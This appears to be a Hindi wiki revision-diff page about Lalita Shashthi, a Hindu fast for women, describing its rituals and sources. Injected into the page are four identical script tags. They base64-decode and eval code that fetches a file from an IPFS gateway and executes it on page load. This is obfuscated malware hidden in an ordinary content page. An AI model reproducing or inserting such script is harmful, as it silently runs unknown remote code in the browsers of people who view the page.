Difference between revisions of "ललिता षष्ठी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (ललिताषष्ठी का नाम बदलकर ललिता षष्ठी कर दिया गया है)
Line 2: Line 2:
 
*यह व्रत नारियों के लिए है। [[भाद्रपद]] की [[षष्ठी]] को करना चाहिए।
 
*यह व्रत नारियों के लिए है। [[भाद्रपद]] की [[षष्ठी]] को करना चाहिए।
 
*एक नवीन बाँस की फुफेली (पात्र) में किसी नदी का बालू एकत्र करके उससे पाँच पिण्ड बनाकर उस पर ललिता देवी की पूजा विभिन्न प्रकार के 28 या 108 पुष्पों एवं विभिन्न खाद्य पदार्थों के नैवेद्य से की जाती है। उस दिन सखियों के साथ रात्रि में जागरण करना चाहिए।
 
*एक नवीन बाँस की फुफेली (पात्र) में किसी नदी का बालू एकत्र करके उससे पाँच पिण्ड बनाकर उस पर ललिता देवी की पूजा विभिन्न प्रकार के 28 या 108 पुष्पों एवं विभिन्न खाद्य पदार्थों के नैवेद्य से की जाती है। उस दिन सखियों के साथ रात्रि में जागरण करना चाहिए।
*[[सप्तमी]] को सभी नैवेद्य किसी ब्राह्मण को अर्पित, कुमारियों को भोजन, 5 या 10 ब्राह्मण गृहणियों को भोजन कराना चाहिए। तथा 'ललिता मुझ पर प्रसन्न होवें' के साथ उनकी विदाई करनी चाहिए। <ref>हेमाद्रि (व्रतखण्ड 1, 617-620, भविष्योत्तरपुराण 41|1-18 से उद्धरण)</ref>  
+
*[[सप्तमी]] को सभी नैवेद्य किसी ब्राह्मण को अर्पित, कुमारियों को भोजन, 5 या 10 ब्राह्मण गृहणियों को भोजन कराना चाहिए। तथा 'ललिता मुझ पर प्रसन्न होवें' के साथ उनकी विदाई करनी चाहिए।<ref>हेमाद्रि (व्रतखण्ड 1, 617-620, भविष्योत्तरपुराण 41|1-18 से उद्धरण)</ref>  
 
*व्रतरत्नाकर <ref>व्रतरत्नाकर (220-221)</ref> का कथन है कि यह गुर्जर देश में अति प्रसिद्ध है।
 
*व्रतरत्नाकर <ref>व्रतरत्नाकर (220-221)</ref> का कथन है कि यह गुर्जर देश में अति प्रसिद्ध है।
 
   
 
   

Revision as of 06:03, 11 September 2010

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullakhit hindoo dharm ka ek vrat sanskar hai.
  • yah vrat nariyoan ke lie hai. bhadrapad ki shashthi ko karana chahie.
  • ek navin baans ki phupheli (patr) mean kisi nadi ka baloo ekatr karake usase paanch pind banakar us par lalita devi ki pooja vibhinn prakar ke 28 ya 108 pushpoan evan vibhinn khady padarthoan ke naivedy se ki jati hai. us din sakhiyoan ke sath ratri mean jagaran karana chahie.
  • saptami ko sabhi naivedy kisi brahman ko arpit, kumariyoan ko bhojan, 5 ya 10 brahman grihaniyoan ko bhojan karana chahie. tatha 'lalita mujh par prasann hovean' ke sath unaki vidaee karani chahie.[1]
  • vrataratnakar [2] ka kathan hai ki yah gurjar desh mean ati prasiddh hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. hemadri (vratakhand 1, 617-620, bhavishyottarapuran 41|1-18 se uddharan)
  2. vrataratnakar (220-221)

sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>